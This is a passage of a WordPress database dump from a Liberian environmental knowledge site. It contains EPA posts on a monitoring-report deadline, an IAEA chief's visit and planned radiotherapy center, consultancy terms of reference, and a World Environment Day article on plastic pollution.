rel=\"noopener\">Download</a>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Consultancy to Conduct Technical Evaluation and TACCC Check on the Zero Draft of Liberia’s BTR1NC3','','inherit','closed','closed','','5484-revision-v1','','','2025-06-26 11:17:42','2025-06-26 11:17:42','',5484,'https://ekmsliberia.info/?p=5488',0,'revision','',0),(5489,38,'2025-06-27 11:50:29','2025-06-27 11:50:29','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency (EPA) of Liberia wishes to inform all project developers, operators, and permit holders with valid environmental permits of a mandatory directive concerning the submission of environmental monitoring reports. This directive is issued in accordance with&nbsp;<strong>section 24</strong>&nbsp;of the Environmental Protection and Management Law (EPML) and the relevant provisions of the EPA Act.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Reminder of Obligations:</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>All operators are reminded of their responsibility to submit periodic monitoring reports that detail the implementation of their Environmental and Social Management Plans (ESMPs) and ensure compliance with all permit conditions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>All permit holders are reminded that the submission of periodic environmental monitoring reports is a legal requirement to demonstrate continued compliance with the terms and conditions outlined in their Environmental Permits and Environmental and Social Management Plans (ESMPs). These reports are vital for ensuring that adverse environmental and social impacts are being effectively mitigated throughout the operational phase of the project.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Key Instructions:</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>Submission Deadline: All operators must submit their latest environmental monitoring report no later than July 31, 2025.</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Required Data: Reports must include comprehensive information on air quality, water quality, waste management, noise levels, and community health and safety updates, as applicable.&nbsp;</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Submission Format: Reports must be submitted both in digital (PDF or Excel) and hard copy formats to the EPA’s Department of Compliance and Enforcement through the office of the Executive Director.&nbsp;</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>Non-Compliance Notice:</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please be advised that failure to comply with this directive will constitute a breach of permit conditions and may result in regulatory enforcement actions, including written warnings, administrative fines, suspension or revocation of the environmental permit, or legal proceedings in accordance with the EPA Act and EPML.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We appreciate your cooperation in ensuring compliance with environmental regulations and upholding Liberia’s environmental standards.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For further information, please contact: 0777797160</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Thank you for your attention to this important matter.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Signed:&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Danise Love Dennis- Dodoo (Mrs)</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Media and Corporate Communication Head</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Environmental Protection Agency of Liberia (EPA)</strong></p>\n<!-- /wp:paragraph -->','Mandatory Submission of Environmental Monitoring Reports','','publish','open','open','','mandatory-submission-of-environmental-monitoring-reports','','','2025-06-27 11:50:31','2025-06-27 11:50:31','',0,'https://ekmsliberia.info/?p=5489',52,'post','',0),(5490,38,'2025-06-27 11:50:15','2025-06-27 11:50:15','','RPrGpurS_400x400','','inherit','open','closed','','rprgpurs_400x400','','','2025-06-27 11:50:15','2025-06-27 11:50:15','',5489,'https://ekmsliberia.info/wp-content/uploads/2025/06/RPrGpurS_400x400.jpg',0,'attachment','image/jpeg',0),(5491,38,'2025-06-27 11:50:29','2025-06-27 11:50:29','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency (EPA) of Liberia wishes to inform all project developers, operators, and permit holders with valid environmental permits of a mandatory directive concerning the submission of environmental monitoring reports. This directive is issued in accordance with&nbsp;<strong>section 24</strong>&nbsp;of the Environmental Protection and Management Law (EPML) and the relevant provisions of the EPA Act.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Reminder of Obligations:</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>All operators are reminded of their responsibility to submit periodic monitoring reports that detail the implementation of their Environmental and Social Management Plans (ESMPs) and ensure compliance with all permit conditions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>All permit holders are reminded that the submission of periodic environmental monitoring reports is a legal requirement to demonstrate continued compliance with the terms and conditions outlined in their Environmental Permits and Environmental and Social Management Plans (ESMPs). These reports are vital for ensuring that adverse environmental and social impacts are being effectively mitigated throughout the operational phase of the project.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Key Instructions:</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>Submission Deadline: All operators must submit their latest environmental monitoring report no later than July 31, 2025.</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Required Data: Reports must include comprehensive information on air quality, water quality, waste management, noise levels, and community health and safety updates, as applicable.&nbsp;</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Submission Format: Reports must be submitted both in digital (PDF or Excel) and hard copy formats to the EPA’s Department of Compliance and Enforcement through the office of the Executive Director.&nbsp;</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>Non-Compliance Notice:</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please be advised that failure to comply with this directive will constitute a breach of permit conditions and may result in regulatory enforcement actions, including written warnings, administrative fines, suspension or revocation of the environmental permit, or legal proceedings in accordance with the EPA Act and EPML.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We appreciate your cooperation in ensuring compliance with environmental regulations and upholding Liberia’s environmental standards.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For further information, please contact: 0777797160</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Thank you for your attention to this important matter.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Signed:&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Danise Love Dennis- Dodoo (Mrs)</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Media and Corporate Communication Head</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Environmental Protection Agency of Liberia (EPA)</strong></p>\n<!-- /wp:paragraph -->','Mandatory Submission of Environmental Monitoring Reports','','inherit','closed','closed','','5489-revision-v1','','','2025-06-27 11:50:29','2025-06-27 11:50:29','',5489,'https://ekmsliberia.info/?p=5491',0,'revision','',0),(5492,38,'2025-07-04 06:51:13','2025-07-04 06:51:13','<!-- wp:paragraph -->\n<p>MARGIBI COUNTY, Liberia (July 4, 2025) — For the first time in more than 60 years of partnership, the Director General of the International Atomic Energy Agency, Rafael Mariano Grossi, arrived in Liberia Thursday for a two-day visit aimed at strengthening technical cooperation between the country and the U.N. nuclear watchdog.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Grossi was welcomed at Roberts International Airport by senior officials of the Environmental Protection Agency of Liberia (EPA) and other government representatives. His visit underscores the IAEA’s ongoing support for Liberia’s peaceful use of nuclear science, particularly in health, agriculture, energy, water management and environmental protection.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“I’m truly honored to be in Liberia for the very first time,” Grossi told reporters. “Liberia is an important part of our global family at the IAEA. I’m here to help strengthen our partnership and support the country’s goals in healthcare, farming, clean energy and protecting the environment.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia joined the IAEA in 1962 and has since promoted the peaceful application of nuclear technology. While engagement declined during the civil conflict from 1990 to 2005, the country has renewed its participation in the IAEA’s technical cooperation programs in recent years. In 2018, Liberia signed the Revised Supplementary Agreement, which led to its first Country Programme Framework, covering 2019–2025.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Since then, Liberia has made considerable strides, including the establishment of a Radiation Safety Department at the EPA, the training of national experts, and the formulation of a National Energy Master Plan. A key milestone is the groundwork for Liberia’s first national radiotherapy center to address the country’s rising cancer burden.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This is not just about equipment,” Grossi said. “It is about saving lives. We want to help Liberia build its first cancer treatment center.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to Ministry of Health data, Liberia recorded more than 3,800 new cancer cases in 2024, resulting in nearly 2,700 deaths—a 25% increase compared to 2018. Despite this growing public health challenge, the country lacks a fully equipped radiotherapy facility. A comprehensive proposal for such a center has already been developed, and Grossi’s visit is expected to raise awareness and attract critical funding.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Grossi also emphasized the IAEA’s commitment to human capacity building, with scholarships, fellowships and training programs targeting Liberians—particularly women and youth—in fields including radiological safety, nuclear science and medical physics.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Beyond health, Liberia is benefiting from IAEA-supported agricultural programs. These include the use of mutation breeding and accelerated plant growth techniques to boost rice and vegetable yields, contributing to food security and income generation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During his visit, Grossi is scheduled to meet with President Joseph Nyuma Boakai to discuss how nuclear science can support the administration’s ARREST Agenda for Inclusive Development. Liberia has submitted its second Country Programme Framework (2026–2030), which prioritizes six areas of cooperation: nuclear safety, food and agriculture, human health, energy, animal health and water resource management.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Under this upcoming framework, Liberia plans to establish an independent nuclear regulatory body, enhance seed production and crop research through the Central Agriculture Research Institute (CARI), and complete its radiotherapy center staffed with trained professionals. Additional priorities include improved national energy planning, early detection of animal diseases, and the application of isotopic techniques to monitor water resources impacted by mining and deforestation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Grossi’s visit also reflects the IAEA’s recognition of Liberia’s growing commitment to nuclear safety. In recent months, Liberia acceded to six international legal instruments governing emergency response, nuclear material protection, and safety protocols.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The government is also seeking IAEA support to draft and enact a national nuclear law and to establish a fully independent regulatory authority that aligns with international best practices.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Nuclear science, when used safely and wisely, can be a powerful tool for development,” Grossi said. “Liberia has shown strong commitment, and we are here to walk with the country every step of the way.”</p>\n<!-- /wp:paragraph -->','First-Ever Visit by IAEA Chief to Liberia Boosts Hopes for Radiotherapy Center','','publish','open','open','','first-ever-visit-by-iaea-chief-to-liberia-boosts-hopes-for-radiotherapy-center','','','2025-07-04 06:51:15','2025-07-04 06:51:15','',0,'https://ekmsliberia.info/?p=5492',51,'post','',0),(5493,38,'2025-07-04 06:50:42','2025-07-04 06:50:42','','WhatsApp Image 2025-07-03 at 18.44.35','','inherit','open','closed','','whatsapp-image-2025-07-03-at-18-44-35','','','2025-07-04 06:50:42','2025-07-04 06:50:42','',5492,'https://ekmsliberia.info/wp-content/uploads/2025/07/WhatsApp-Image-2025-07-03-at-18.44.35.jpeg',0,'attachment','image/jpeg',0),(5494,38,'2025-07-04 06:51:13','2025-07-04 06:51:13','<!-- wp:paragraph -->\n<p>MARGIBI COUNTY, Liberia (July 4, 2025) — For the first time in more than 60 years of partnership, the Director General of the International Atomic Energy Agency, Rafael Mariano Grossi, arrived in Liberia Thursday for a two-day visit aimed at strengthening technical cooperation between the country and the U.N. nuclear watchdog.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Grossi was welcomed at Roberts International Airport by senior officials of the Environmental Protection Agency of Liberia (EPA) and other government representatives. His visit underscores the IAEA’s ongoing support for Liberia’s peaceful use of nuclear science, particularly in health, agriculture, energy, water management and environmental protection.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“I’m truly honored to be in Liberia for the very first time,” Grossi told reporters. “Liberia is an important part of our global family at the IAEA. I’m here to help strengthen our partnership and support the country’s goals in healthcare, farming, clean energy and protecting the environment.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia joined the IAEA in 1962 and has since promoted the peaceful application of nuclear technology. While engagement declined during the civil conflict from 1990 to 2005, the country has renewed its participation in the IAEA’s technical cooperation programs in recent years. In 2018, Liberia signed the Revised Supplementary Agreement, which led to its first Country Programme Framework, covering 2019–2025.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Since then, Liberia has made considerable strides, including the establishment of a Radiation Safety Department at the EPA, the training of national experts, and the formulation of a National Energy Master Plan. A key milestone is the groundwork for Liberia’s first national radiotherapy center to address the country’s rising cancer burden.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This is not just about equipment,” Grossi said. “It is about saving lives. We want to help Liberia build its first cancer treatment center.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to Ministry of Health data, Liberia recorded more than 3,800 new cancer cases in 2024, resulting in nearly 2,700 deaths—a 25% increase compared to 2018. Despite this growing public health challenge, the country lacks a fully equipped radiotherapy facility. A comprehensive proposal for such a center has already been developed, and Grossi’s visit is expected to raise awareness and attract critical funding.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Grossi also emphasized the IAEA’s commitment to human capacity building, with scholarships, fellowships and training programs targeting Liberians—particularly women and youth—in fields including radiological safety, nuclear science and medical physics.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Beyond health, Liberia is benefiting from IAEA-supported agricultural programs. These include the use of mutation breeding and accelerated plant growth techniques to boost rice and vegetable yields, contributing to food security and income generation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During his visit, Grossi is scheduled to meet with President Joseph Nyuma Boakai to discuss how nuclear science can support the administration’s ARREST Agenda for Inclusive Development. Liberia has submitted its second Country Programme Framework (2026–2030), which prioritizes six areas of cooperation: nuclear safety, food and agriculture, human health, energy, animal health and water resource management.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Under this upcoming framework, Liberia plans to establish an independent nuclear regulatory body, enhance seed production and crop research through the Central Agriculture Research Institute (CARI), and complete its radiotherapy center staffed with trained professionals. Additional priorities include improved national energy planning, early detection of animal diseases, and the application of isotopic techniques to monitor water resources impacted by mining and deforestation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Grossi’s visit also reflects the IAEA’s recognition of Liberia’s growing commitment to nuclear safety. In recent months, Liberia acceded to six international legal instruments governing emergency response, nuclear material protection, and safety protocols.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The government is also seeking IAEA support to draft and enact a national nuclear law and to establish a fully independent regulatory authority that aligns with international best practices.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Nuclear science, when used safely and wisely, can be a powerful tool for development,” Grossi said. “Liberia has shown strong commitment, and we are here to walk with the country every step of the way.”</p>\n<!-- /wp:paragraph -->','First-Ever Visit by IAEA Chief to Liberia Boosts Hopes for Radiotherapy Center','','inherit','closed','closed','','5492-revision-v1','','','2025-07-04 06:51:13','2025-07-04 06:51:13','',5492,'https://ekmsliberia.info/?p=5494',0,'revision','',0),(5495,38,'2025-07-08 09:59:48','2025-07-08 09:59:48','<p style=\"font-weight: 400;\"><strong>Background</strong></p>\r\n<p style=\"font-weight: 400;\">The Environmental Protection Agency (EPA) serves as the Implementing Partner for the United Nations Development Programme’s (UNDP) five-year <em>Energy and Environment Programme</em>, which falls under the <em>Inclusive Green Growth and Sustainable Development Pillar</em>. This initiative is designed to integrate environmental and climate change considerations into national development priorities and strategies. It also seeks to strengthen national capacities in environmental governance, enhance public awareness and utilization of Early Warning Systems, promote the use of alternative energy sources, and contribute to the achievement of Sustainable Development Goals (SDGs) 7, 11, 13, 14, 15, and 17 — with a focus on fostering environmental sustainability.</p>\r\n<p style=\"font-weight: 400;\"><strong> </strong></p>\r\n<p style=\"font-weight: 400;\"><strong>Purpose of the Terms of Reference</strong></p>\r\n<p style=\"font-weight: 400;\">These Terms of Reference outline the responsibilities and expectations for the role of <em>Energy and Environment Programme Coordinator</em>. The Coordinator will be responsible for structuring, coordinating, and supporting the implementation of environmental projects across Liberia in alignment with the overarching objectives of the Programme.</p>\r\n<p style=\"font-weight: 400;\">The Coordinator will play a pivotal role in managing project activities implemented under UNDP’s <em>National Implementation Modality (NIM)</em> framework. In addition to overseeing coordination and execution, the incumbent will provide technical guidance and support to the EPA’s management team, particularly in project planning, implementation, monitoring and evaluation, knowledge management, and inter-departmental collaboration.</p>\r\n<p style=\"font-weight: 400;\">As a sector expert, the Programme Coordinator will also offer technical assistance on issues related to environmental degradation, pollution control, and regulatory compliance. This includes contributing to the development of the National Environment Report, supporting environmental and social impact assessments (ESIAs), and overseeing environmental monitoring and audits.</p>\r\nDownload:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/07/Edited-TOR-for-EE-Program-Coordinator-EPA.docx\" target=\"_blank\" rel=\"noopener\">Click</a>','Energy and Environment Program Coordinator','','publish','closed','closed','','energy-and-environment-program-coordinator','','','2025-07-08 10:01:16','2025-07-08 10:01:16','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5495',55,'ekms_bulletin','',0),(5496,38,'2025-07-08 09:50:56','2025-07-08 09:50:56','<p style=\"font-weight: 400;\"><strong>Background</strong></p>\r\n<p style=\"font-weight: 400;\">The Environmental Protection Agency (EPA) serves as the Implementing Partner for the United Nations Development Programme’s (UNDP) five-year <em>Energy and Environment Programme</em>, which falls under the <em>Inclusive Green Growth and Sustainable Development Pillar</em>. This initiative is designed to integrate environmental and climate change considerations into national development priorities and strategies. It also seeks to strengthen national capacities in environmental governance, enhance public awareness and utilization of Early Warning Systems, promote the use of alternative energy sources, and contribute to the achievement of Sustainable Development Goals (SDGs) 7, 11, 13, 14, 15, and 17 — with a focus on fostering environmental sustainability.</p>\r\n<p style=\"font-weight: 400;\"><strong> </strong></p>\r\n<p style=\"font-weight: 400;\"><strong>Purpose of the Terms of Reference</strong></p>\r\n<p style=\"font-weight: 400;\">These Terms of Reference outline the responsibilities and expectations for the role of <em>Energy and Environment Programme Coordinator</em>. The Coordinator will be responsible for structuring, coordinating, and supporting the implementation of environmental projects across Liberia in alignment with the overarching objectives of the Programme.</p>\r\n<p style=\"font-weight: 400;\">The Coordinator will play a pivotal role in managing project activities implemented under UNDP’s <em>National Implementation Modality (NIM)</em> framework. In addition to overseeing coordination and execution, the incumbent will provide technical guidance and support to the EPA’s management team, particularly in project planning, implementation, monitoring and evaluation, knowledge management, and inter-departmental collaboration.</p>\r\n<p style=\"font-weight: 400;\">As a sector expert, the Programme Coordinator will also offer technical assistance on issues related to environmental degradation, pollution control, and regulatory compliance. This includes contributing to the development of the National Environment Report, supporting environmental and social impact assessments (ESIAs), and overseeing environmental monitoring and audits.</p>','Energy and Environment Program Coordinator','','inherit','closed','closed','','5495-revision-v1','','','2025-07-08 09:50:56','2025-07-08 09:50:56','',5495,'https://ekmsliberia.info/?p=5496',0,'revision','',0),(5497,38,'2025-07-08 09:52:06','2025-07-08 09:52:06','','Edited TOR for EE Program Coordinator-EPA','','inherit','open','closed','','edited-tor-for-ee-program-coordinator-epa','','','2025-07-08 09:52:06','2025-07-08 09:52:06','',0,'https://ekmsliberia.info/wp-content/uploads/2025/07/Edited-TOR-for-EE-Program-Coordinator-EPA.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5498,38,'2025-07-08 09:59:48','2025-07-08 09:59:48','<p style=\"font-weight: 400;\"><strong>Background</strong></p>\r\n<p style=\"font-weight: 400;\">The Environmental Protection Agency (EPA) serves as the Implementing Partner for the United Nations Development Programme’s (UNDP) five-year <em>Energy and Environment Programme</em>, which falls under the <em>Inclusive Green Growth and Sustainable Development Pillar</em>. This initiative is designed to integrate environmental and climate change considerations into national development priorities and strategies. It also seeks to strengthen national capacities in environmental governance, enhance public awareness and utilization of Early Warning Systems, promote the use of alternative energy sources, and contribute to the achievement of Sustainable Development Goals (SDGs) 7, 11, 13, 14, 15, and 17 — with a focus on fostering environmental sustainability.</p>\r\n<p style=\"font-weight: 400;\"><strong> </strong></p>\r\n<p style=\"font-weight: 400;\"><strong>Purpose of the Terms of Reference</strong></p>\r\n<p style=\"font-weight: 400;\">These Terms of Reference outline the responsibilities and expectations for the role of <em>Energy and Environment Programme Coordinator</em>. The Coordinator will be responsible for structuring, coordinating, and supporting the implementation of environmental projects across Liberia in alignment with the overarching objectives of the Programme.</p>\r\n<p style=\"font-weight: 400;\">The Coordinator will play a pivotal role in managing project activities implemented under UNDP’s <em>National Implementation Modality (NIM)</em> framework. In addition to overseeing coordination and execution, the incumbent will provide technical guidance and support to the EPA’s management team, particularly in project planning, implementation, monitoring and evaluation, knowledge management, and inter-departmental collaboration.</p>\r\n<p style=\"font-weight: 400;\">As a sector expert, the Programme Coordinator will also offer technical assistance on issues related to environmental degradation, pollution control, and regulatory compliance. This includes contributing to the development of the National Environment Report, supporting environmental and social impact assessments (ESIAs), and overseeing environmental monitoring and audits.</p>\r\nDownload:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/07/Edited-TOR-for-EE-Program-Coordinator-EPA.docx\" target=\"_blank\" rel=\"noopener\">Click</a>','Energy and Environment Program Coordinator','','inherit','closed','closed','','5495-revision-v1','','','2025-07-08 09:59:48','2025-07-08 09:59:48','',5495,'https://ekmsliberia.info/?p=5498',0,'revision','',0),(5499,38,'2025-07-08 17:28:43','2025-07-08 17:28:43','<strong>Background</strong>\r\nThe Liberian capital Monrovia is particularly vulnerable to climate effects, namely sea level rise and the increased frequency of high-intensity storms. This has resulted in coastal erosion and shoreline retreat, which threatens the sustainability of ecosystem services and directly impacts Monrovians fishery-based livelihoods of approximately 55,000 Monrovians, 46% of whom are women.\r\nTherefore, in an effort to reduce the vulnerability of coastal environments/ecosystems to climate risks;\r\nthe Government of Liberia (GoL), the Green Climate Fund (GCF), and the United Nations Development Programme (UNDP) developed the Monrovia Metropolitan Climate Resilience Project (MMCRP).\r\n\r\nThe Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the project, and the\r\nUnited Nations Development Programme (UNDP) is the Accredited Entity. The MMCRP is financed\r\nthrough a grant from GCF and co-finance from UNDP and GoL.\r\nThe core aim of the Project is to build the long-term climate resilience of coastal communities in Liberia by both addressing immediate adaptation priorities and creating an enabling environment for up-scaling coastal adaptation initiatives to other parts of Monrovia and Liberia. This will be achieved through three outputs, namely:\r\n\r\n<strong>Output 1:</strong> Protection of coastal communities and infrastructure at West Point against erosion\r\ncaused by sea-level rise and increasingly frequent high-intensity storms;\r\n<strong>Output 2:</strong> Institutional capacity building and policy support for the implementation of Integrated\r\nCoastal Zone Management (ICZM) across Liberia; and\r\n<strong> Output 3:</strong> Protection of mangroves and strengthening of gender- and climate-sensitive\r\nlivelihoods to build local climate resilience in Monrovia (Output 3).\r\n\r\nDownload:<a href=\"http://Output 1: Protection of coastal communities and infrastructure at West Point against erosion caused by sea-level rise and increasingly frequent high-intensity storms;  Output 2: Institutional capacity building and policy support for the implementation of Integrated Coastal Zone Management (ICZM) across Liberia; and  Output 3: Protection of mangroves and strengthening of gender- and climate-sensitive livelihoods to build local climate resilience in Monrovia (Output 3).\" target=\"_blank\" rel=\"noopener\">Click</a>','National firm to undertake baseline and periodic assessments of climate-resilient livelihood practices and opportunities - MMCRP','','publish','closed','closed','','national-firm-to-undertake-baseline-and-periodic-assessments-of-climate-resilient-livelihood-practices-and-opportunities-mmcrp','','','2025-07-08 17:30:06','2025-07-08 17:30:06','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5499',54,'ekms_bulletin','',0),(5500,38,'2025-07-08 17:26:53','2025-07-08 17:26:53','','TOR_Assess baseline of existing livelihood strategies_final_clean','','inherit','open','closed','','tor_assess-baseline-of-existing-livelihood-strategies_final_clean','','','2025-07-08 17:26:53','2025-07-08 17:26:53','',0,'https://ekmsliberia.info/wp-content/uploads/2025/07/TOR_Assess-baseline-of-existing-livelihood-strategies_final_clean.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5501,38,'2025-07-08 17:28:43','2025-07-08 17:28:43','<strong>Background</strong>\r\nThe Liberian capital Monrovia is particularly vulnerable to climate effects, namely sea level rise and the increased frequency of high-intensity storms. This has resulted in coastal erosion and shoreline retreat, which threatens the sustainability of ecosystem services and directly impacts Monrovians fishery-based livelihoods of approximately 55,000 Monrovians, 46% of whom are women.\r\nTherefore, in an effort to reduce the vulnerability of coastal environments/ecosystems to climate risks;\r\nthe Government of Liberia (GoL), the Green Climate Fund (GCF), and the United Nations Development Programme (UNDP) developed the Monrovia Metropolitan Climate Resilience Project (MMCRP).\r\n\r\nThe Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the project, and the\r\nUnited Nations Development Programme (UNDP) is the Accredited Entity. The MMCRP is financed\r\nthrough a grant from GCF and co-finance from UNDP and GoL.\r\nThe core aim of the Project is to build the long-term climate resilience of coastal communities in Liberia by both addressing immediate adaptation priorities and creating an enabling environment for up-scaling coastal adaptation initiatives to other parts of Monrovia and Liberia. This will be achieved through three outputs, namely:\r\n\r\n<strong>Output 1:</strong> Protection of coastal communities and infrastructure at West Point against erosion\r\ncaused by sea-level rise and increasingly frequent high-intensity storms;\r\n<strong>Output 2:</strong> Institutional capacity building and policy support for the implementation of Integrated\r\nCoastal Zone Management (ICZM) across Liberia; and\r\n<strong> Output 3:</strong> Protection of mangroves and strengthening of gender- and climate-sensitive\r\nlivelihoods to build local climate resilience in Monrovia (Output 3).\r\n\r\nDownload:<a href=\"http://Output 1: Protection of coastal communities and infrastructure at West Point against erosion caused by sea-level rise and increasingly frequent high-intensity storms;  Output 2: Institutional capacity building and policy support for the implementation of Integrated Coastal Zone Management (ICZM) across Liberia; and  Output 3: Protection of mangroves and strengthening of gender- and climate-sensitive livelihoods to build local climate resilience in Monrovia (Output 3).\" target=\"_blank\" rel=\"noopener\">Click</a>','National firm to undertake baseline and periodic assessments of climate-resilient livelihood practices and opportunities - MMCRP','','inherit','closed','closed','','5499-revision-v1','','','2025-07-08 17:28:43','2025-07-08 17:28:43','',5499,'https://ekmsliberia.info/?p=5501',0,'revision','',0),(5502,38,'2025-06-08 21:30:00','2025-06-08 21:30:00','<!-- wp:paragraph -->\n<p>Paynesville, Sunday, June 8, 2025_Environmental Protection Agency (EPA) of Liberia on Thursday, June 5, 2025, joined the rest of the world to celebrate the 52nd World Environment Day at the PaynesvilleCity Hall. This year’s global theme is “Ending Plastic Pollution,” while Liberia adopted a local theme: “Enhance the Three-Rs: Reduce, Reuse, and Recycle.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>World Environment Day was established by a <a></a>resolution adopted by the United Nations General Assembly in 1972. Since then, June 5 each year is observed as a day for governments and citizens across the world to focus attention on the importance of the environment and take actions that promote sustainability.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking through a proclamation read by student Yonnah R. Juah, President Joseph N. Boakai said the observance of World Environment Day provides an opportunity to focus global attention on environmental issues and to empower people to take action for sustainable and equitable development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The President emphasized the need for Liberians to take concrete steps toward ending plastic pollution within their communities. He noted that the responsibility lies with both the government and the citizens to find suitable ways to mitigate environmental pollution.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>President Boakai called on all individuals living in Liberia to cooperate with the Environmental Protection Agency in executing the programs set aside for the celebration of the day.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Statistics from a recent World Bank and EPA report highlight the urgency of the matter. It indicates that each Liberian generates about 0.44 kg of waste per day. Altogether, 1.5 million kg of solid waste is produced across Liberia daily. Unfortunately, 84.4% of this waste is mismanaged, placing Liberia among the worst-ranked countries in Sub-Saharan Africa in terms of waste management.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia has endorsed the United Nations global plastic treaty resolution at the Fifth United Nations Environment Assembly (UNEA-5), which commits member states to legally-binding actions to reduce plastic pollution. This move signifies the government’s recognition of the crisis and its intent to align with global efforts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On October 17, 2024, Liberia validated its National Solid Waste Management Policy. The policy aligns with World Bank data and confirms that 64% of all solid waste in the country is illegally dumped. This reinforces the need for urgent action.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia faces a serious problem with plastic pollution. Most of the plastic waste ends up in water bodies, farmlands, and marine ecosystems. However, there are growing initiatives by the EPA, the United Nations Development Programme (UNDP), local NGOs, and grassroots organizations. These groups are making meaningful progress in areas like waste 